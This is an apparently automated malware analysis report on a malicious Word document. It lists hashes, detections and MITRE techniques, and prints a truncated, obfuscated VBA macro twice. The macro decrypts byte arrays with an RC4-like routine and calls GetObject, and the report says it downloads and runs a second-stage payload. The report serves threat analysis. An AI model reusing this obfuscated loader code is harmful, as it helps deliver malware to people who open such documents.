Office (OLE) malware analysis — malicious · 8078ed991cbc81e4

MALICIOUS

Office (OLE)

327.5 KB Created: 2018-07-21 05:29:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: ed2b0aa602da76e3fd727bc39ea98990 SHA-1: 8ef44a38cd4c76f7d5874f9c28eb450cff86cd7b SHA-256: 8078ed991cbc81e43fb82acad2b6c417e8a9a40f22f5e320f6d4c38abb5b48f4

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The presence of VBA macros, specifically the detection of GetObject and CallByName functions, strongly suggests malicious intent. The ClamAV detection 'Doc.Macro.Obfuscation-6663668-0' further confirms this. The VBA code appears to be heavily obfuscated, but its structure indicates it's designed to download and execute a secondary payload, likely leveraging the embedded 'macros.bas' file.

Heuristics 5

ClamAV: Doc.Macro.Obfuscation-6663668-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6663668-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
GetObject call high OLE_VBA_GETOBJ

GetObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17643 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17643 bytes
SHA-256: `73648210224a2a2136f67f48eb2611164ca778c26f42a3c216ed5fbe9747fa54`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim D12, D45(2) As Byte, D13(9) As Byte, D7(32) As Byte, D39(19) As Byte, D22(13) As Byte, D05(5) As Byte, D44(55) As Byte, D77(823) As Byte, D74(5) As Byte Private Function D0(D30, D21) D0 = (D30 And Not D21) Or (Not D30 And D21) End Function Private Sub f_Layout() If D12 = 0 Then D12 = 95 Dim D26, D01 D01 = 37183669 While D26 <= D01 D26 = D26 + 1 Wend If D26 - 1 = D01 Then D76 End If End If End Sub Private Function D46(D17() As Byte, D35) Dim D52 On Error Resume Next While D52 <= D35 + 1 D46 = D46 & D53(D17(D52)) D52 = D52 + 1 Wend End Function Private Function D27(D92) Set D27 = GetObject(D92) End Function Private Sub D76() D54 Dim D81(0 To 255), D47, D89, D37 As Byte While D47 <= (-5024 + 5279) D81(D47) = D47 D47 = D47 + 1 Wend D47 = 0 While D47 <= (6366 - 6111) D89 = D1((D89 + D81(D47) + D05(D1(D47, (6)))), (276480 / 1080)) D37 = D81(D47) D81(D47) = D81(D89) D81(D89) = D37 D47 = D47 + 1 Wend D28 Dim D82 Set D82 = D27(D4(D44(), D81(), 56)) D06 D33 D23 Dim D58 D58 = D4(D77(), D81(), 824) D20 D98 D04 D36 Dim D14, D48, D41 Set D14 = D08(D82, D4(D45(), D81(), 3), 1, 0, D4(D39(), D81(), 20), 0) Set D48 = D08(D14, D4(D22(), D81(), 14), 1, 0, 0, 0) D08 D48, D4(D13(), D81(), 10), (33520 / 8380), 0, 0, 0 Set D41 = D27(D4(D7(), D81(), 33)) D08 D41, D4(D74(), D81(), 6), 1, 1, D58, D48 End Sub Private Sub D20() D74(4) = 134 D74(1) = 50 D74(5) = 62 D74(3) = 193 D74(0) = 204 End Sub Private Sub D23() D77(192) = 13 D77(501) = 35 D77(444) = 212 D77(82) = 131 D77(71) = 140 D77(57) = 145 D77(286) = 249 D77(366) = 55 D77(667) = 237 D77(457) = 186 D77(193) = 200 D77(753) = 80 D77(73) = 185 D77(472) = 100 D77(774) = 104 D77(151) = 21 D77(225) = 96 D77(215) = 13 D77(567) = 140 D77(728) = 45 D77(268) = 127 D77(150) = 87 D77(350) = 237 D77(601) = 42 D77(262) = 204 D77(416) = 195 D77(515) = 229 D77(619) = 217 D77(432) = 46 D77(273) = 110 D77(481) = 73 D77(474) = 57 D77(537) = 167 D77(718) = 128 D77(6) = 225 D77(741) = 154 D77(280) = 194 D77(726) = 147 D77(129) = 53 D77(749) = 60 D77(359) = 14 D77(782) = 124 D77(257) = 61 D77(686) = 187 D77(35) = 62 D77(707) = 246 D77(392) = 234 D77(30) = 61 D77(279) = 249 D77(50) = 207 D77(121) = 150 D77(610) = 67 D77(798) = 18 D77(99) = 155 D77(816) = 254 D77(114) = 183 D77(627) = 254 D77(91) = 221 D77(111) = 149 D77(378) = 145 D77(255) = 49 D77(294) = 81 D77(817) = 140 D77(340) = 118 D77(698) = 56 D77(476) = 187 D77(217) = 117 D77(545) = 68 D77(775) = 138 D77(529) = 80 D77(349) = 48 D77(528) = 22 D77(228) = 210 D77(631) = 23 D77(506) = 124 D77(138) = 183 D77(466) = 247 D77(783) = 123 D77(510) = 217 D77(781) = 214 D77(548) = 239 D77(172) = 241 D77(90) = 90 D77(112) = 138 D77(81) = 136 D77(242) = 52 D77(756) = 241 D77(495) = 45 D77(808) = 2 D77(591) = 128 D77(46) = 227 D77(512) = 160 D77(377) = 131 D77(509) = 27 D77(561) = 163 D77(802) = 154 D77(252) = 7 D77(309) = 67 D77(521) = 95 D77(580) = 248 D77(820) = 121 D77(21) = 174 D77(235) = 148 D77(747) = 92 D77(202) = 42 D77(657) = 196 D77(587) = 34 D77(76) = 68 D77(423) = 122 D77(745) = 96 D77(558) = 88 D77(277) = 186 D77(676) = 24 D77(614) = 127 D77(552) = 224 D77(317) = 186 D77(645) = 254 D77(596) = 225 D77(5) = 13 D77(496) = 104 D77(218) = 95 D77(797) = 131 D77(437) = 21 D77(478) = 10 D77(708) = 198 D77(16) = 6 D77(27) = 242 D77(234) = 80 D77(763) = 100 D77(731) = 138 D77(618) = 37 D77(159) = 217 D77(26) = 152 D77(743) = 32 D77(762) = 5 D77(417) = 122 D77(690) = 33 D77(671) = 23 D77(301) = 240 D77(170) = 129 D77(801) = 11 D77(264) = 5 D77(482) = 104 D77(405) = 217 D77(390) = 171 D77(304) = 128 D77(533) = 240 D77(221) = 21 D77(560) = 63 D77(246) = 60 D77(135) = 3 ... (truncated)

SHA-256: 73648210224a2a2136f67f48eb2611164ca778c26f42a3c216ed5fbe9747fa54

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim D12, D45(2) As Byte, D13(9) As Byte, D7(32) As Byte, D39(19) As Byte, D22(13) As Byte, D05(5) As Byte, D44(55) As Byte, D77(823) As Byte, D74(5) As Byte
Private Function D0(D30, D21)
D0 = (D30 And Not D21) Or (Not D30 And D21)
End Function
Private Sub f_Layout()
If D12 = 0 Then
D12 = 95
Dim D26, D01
D01 = 37183669
While D26 <= D01
D26 = D26 + 1
Wend
If D26 - 1 = D01 Then
D76
End If
End If
End Sub
Private Function D46(D17() As Byte, D35)
Dim D52
On Error Resume Next
While D52 <= D35 + 1
D46 = D46 & D53(D17(D52))
D52 = D52 + 1
Wend
End Function
Private Function D27(D92)
Set D27 = GetObject(D92)
End Function
Private Sub D76()
D54
Dim D81(0 To 255), D47, D89, D37 As Byte
While D47 <= (-5024 + 5279)
D81(D47) = D47
D47 = D47 + 1
Wend
D47 = 0
While D47 <= (6366 - 6111)
D89 = D1((D89 + D81(D47) + D05(D1(D47, (6)))), (276480 / 1080))
D37 = D81(D47)
D81(D47) = D81(D89)
D81(D89) = D37
D47 = D47 + 1
Wend
D28
Dim D82
Set D82 = D27(D4(D44(), D81(), 56))
D06
D33
D23
Dim D58
D58 = D4(D77(), D81(), 824)
D20
D98
D04
D36
Dim D14, D48, D41
Set D14 = D08(D82, D4(D45(), D81(), 3), 1, 0, D4(D39(), D81(), 20), 0)
Set D48 = D08(D14, D4(D22(), D81(), 14), 1, 0, 0, 0)
D08 D48, D4(D13(), D81(), 10), (33520 / 8380), 0, 0, 0
Set D41 = D27(D4(D7(), D81(), 33))
D08 D41, D4(D74(), D81(), 6), 1, 1, D58, D48
End Sub
Private Sub D20()
D74(4) = 134
D74(1) = 50
D74(5) = 62
D74(3) = 193
D74(0) = 204
End Sub
Private Sub D23()
D77(192) = 13
D77(501) = 35
D77(444) = 212
D77(82) = 131
D77(71) = 140
D77(57) = 145
D77(286) = 249
D77(366) = 55
D77(667) = 237
D77(457) = 186
D77(193) = 200
D77(753) = 80
D77(73) = 185
D77(472) = 100
D77(774) = 104
D77(151) = 21
D77(225) = 96
D77(215) = 13
D77(567) = 140
D77(728) = 45
D77(268) = 127
D77(150) = 87
D77(350) = 237
D77(601) = 42
D77(262) = 204
D77(416) = 195
D77(515) = 229
D77(619) = 217
D77(432) = 46
D77(273) = 110
D77(481) = 73
D77(474) = 57
D77(537) = 167
D77(718) = 128
D77(6) = 225
D77(741) = 154
D77(280) = 194
D77(726) = 147
D77(129) = 53
D77(749) = 60
D77(359) = 14
D77(782) = 124
D77(257) = 61
D77(686) = 187
D77(35) = 62
D77(707) = 246
D77(392) = 234
D77(30) = 61
D77(279) = 249
D77(50) = 207
D77(121) = 150
D77(610) = 67
D77(798) = 18
D77(99) = 155
D77(816) = 254
D77(114) = 183
D77(627) = 254
D77(91) = 221
D77(111) = 149
D77(378) = 145
D77(255) = 49
D77(294) = 81
D77(817) = 140
D77(340) = 118
D77(698) = 56
D77(476) = 187
D77(217) = 117
D77(545) = 68
D77(775) = 138
D77(529) = 80
D77(349) = 48
D77(528) = 22
D77(228) = 210
D77(631) = 23
D77(506) = 124
D77(138) = 183
D77(466) = 247
D77(783) = 123
D77(510) = 217
D77(781) = 214
D77(548) = 239
D77(172) = 241
D77(90) = 90
D77(112) = 138
D77(81) = 136
D77(242) = 52
D77(756) = 241
D77(495) = 45
D77(808) = 2
D77(591) = 128
D77(46) = 227
D77(512) = 160
D77(377) = 131
D77(509) = 27
D77(561) = 163
D77(802) = 154
D77(252) = 7
D77(309) = 67
D77(521) = 95
D77(580) = 248
D77(820) = 121
D77(21) = 174
D77(235) = 148
D77(747) = 92
D77(202) = 42
D77(657) = 196
D77(587) = 34
D77(76) = 68
D77(423) = 122
D77(745) = 96
D77(558) = 88
D77(277) = 186
D77(676) = 24
D77(614) = 127
D77(552) = 224
D77(317) = 186
D77(645) = 254
D77(596) = 225
D77(5) = 13
D77(496) = 104
D77(218) = 95
D77(797) = 131
D77(437) = 21
D77(478) = 10
D77(708) = 198
D77(16) = 6
D77(27) = 242
D77(234) = 80
D77(763) = 100
D77(731) = 138
D77(618) = 37
D77(159) = 217
D77(26) = 152
D77(743) = 32
D77(762) = 5
D77(417) = 122
D77(690) = 33
D77(671) = 23
D77(301) = 240
D77(170) = 129
D77(801) = 11
D77(264) = 5
D77(482) = 104
D77(405) = 217
D77(390) = 171
D77(304) = 128
D77(533) = 240
D77(221) = 21
D77(560) = 63
D77(246) = 60
D77(135) = 3
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.